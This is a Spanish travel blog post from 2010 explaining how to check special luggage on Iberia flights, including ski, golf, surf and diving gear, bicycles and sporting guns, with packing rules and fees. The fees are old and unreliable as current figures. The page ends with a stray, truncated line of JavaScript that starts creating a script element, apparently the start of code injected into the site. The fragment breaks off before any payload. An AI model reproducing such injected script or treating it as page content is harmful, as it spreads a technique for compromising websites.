Viajar con equipaje especial

26/08/2010


Cada vez son más los viajeros que se animan a volar a otros rincones del planeta para practicar su deporte favorito, o deciden llevarse de viaje la bicicleta. A pesar de que, a priori, esto podría parecer complicado, aquí os dejamos información sobre todo aquello que necesitáis facturar si vais a jugar al golf, a esquiar o volvéis de hacer el Camino de Santiago en bicicleta.

  • Esquís, bastones, botas y tabla de snow

En términos de transporte, se define como equipo de esquiar para nieve o agua, aquel que está compuesto por un par de esquíes y de bastones o una snowwboard o monoski más un par de botas de esquí y de fijaciones. En el caso del esquí acuático, se consideran como equipo un par de esquíes acuáticos tamaño estándar o un esquí acuático de slalom.

Todo el equipo se puede facturar sin ningún problema; sin embargo, con el fin de evitar posibles daños en el material, debe ir adecuadamente colocado y sujeto. En tiendas especializadas se pueden encontrar bolsas especiales para los esquís, tabla de snow, y también para las botas.

Forma parte de la franquicia gratuita del cliente siempre y cuando no exceda la franquicia autorizada. Si al número de estas piezas se añade alguna pieza de equipaje sobrepasando el número total permitido, se tratará como exceso de equipaje.

  • Equipo de golf

Es considerado como equipaje especial la bolsa que contenga un máximo de 14 palos, una docena de pelotas y un par de zapatos de golf. La bolsa que se requiere para volar es la misma que se utiliza para ir al campo, sin tener que abonar tarifa de exceso de equipaje.

Si al número de estas piezas se añade alguna pieza de equipaje sobrepasando el número total permitido, se tratará como exceso de equipaje.

  • Surf, windsurfing y kiteboard

El transporte de estos equipos, sobre todo de windsurf y kiteboard, es algo especial debido al considerable volumen de éstos. (El de windsurfing se compone de tabla, botavara, orza, mástil y vela y el de kiteboard de una tabla y un paracaídas.) Por esta razón, resulta imprescindible hacer una petición de espacio a la hora de realizar la reserva de los billetes -un mínimo de 24 horas antes de la salida del vuelo- y que el usuario llegue al aeropuerto con suficiente antelación para su traslado hasta el avión.

Resulta obvio decir que, para el transporte, todo el equipo debe ir convenientemente embalado con el fin de que no sufra, ni cause daños a otros equipajes en el embarque, transporte y desembarque.

Se tratarán siempre como exceso de equipaje con una tarifa fija de 150 EUR por trayecto, abonable exclusivamente en el aeropuerto, independientemente del destino -se podrán aplicar diversos cargos, tasas o impuestos, de acuerdo a la legislación de cada país-.

El equipo de surf y el de bodyboard se componen, exclusivamente, de una tabla. El de wind-surfing consta de tabla, botavara, orza, mástil y vela y el de Kite board consta de una tabla y un paracaídas.

  • Bicicletas

Como siempre, lo primero que debe hacer el pasajero es notificar su deseo de viajar con este equipaje especial a la hora de hacer la reserva de los billetes. Solo podrán facturarse bicicletas de un solo asiento y sin motor.

En el aeropuerto, Iberia pone a disposición de sus clientes unas cajas de cartón especiales para el traslado de las bicis (131 x 72 x 21 cm.) que tienen un coste de 20 euros. Si el cliente cuenta con su propio embalaje puede utilizarlo sin ningún problema.

En el interior de la caja, las bicicletas deben ir con el manillar fijado al cuadro de la misma, los pedales quitados y las ruedas desinfladas. Se tratarán siempre como exceso de equipaje con una tarifa fija de 75 EUR por trayecto, abonable exclusivamente en el aeropuerto, independientemente del destino.

La tarifa de peregrinos permite llevar una bicicleta de forma gratuita adicional a la franquicia de equipaje permitida.

  • Equipo de submarinismo

Consideramos como tal el conjunto de: una máscara, un par de aletas, manómetro, regulador, chaleco de seguridad, esnorquel, cinturón de pesos y bombona.

Debemos tener en cuenta que la bombona ha de estar vacía para garantizar una manipulación segura. El transporte de botellas de aire comprimido está prohibido por tratarse de un artículo peligroso.

Se tratará siempre como exceso de equipaje con una tarifa fija de 75 EUR por trayecto, abonable exclusivamente en el aeropuerto, independientemente del destino. Además, se podrán aplicar diversos cargos, tasas o impuestos, de acuerdo a la legislación de cada país

  • Armas deportivas

Si necesitas viajar con una escopeta de aire comprimido, escopeta de caza, escopeta de safari o escopeta de tiro, cualquiera de ellas se tratará siempre como equipaje especial fuera de la franquicia permitida. Su transporte conlleva una tarifa fija de 75 EUR por trayecto, abonable exclusivamente en el aeropuerto, independientemente del destino.

En este enlace encontrareis detallada toda la información que necesitáis.

Foto | P.J.P

var d=document;var s=d.createElement(‘script’);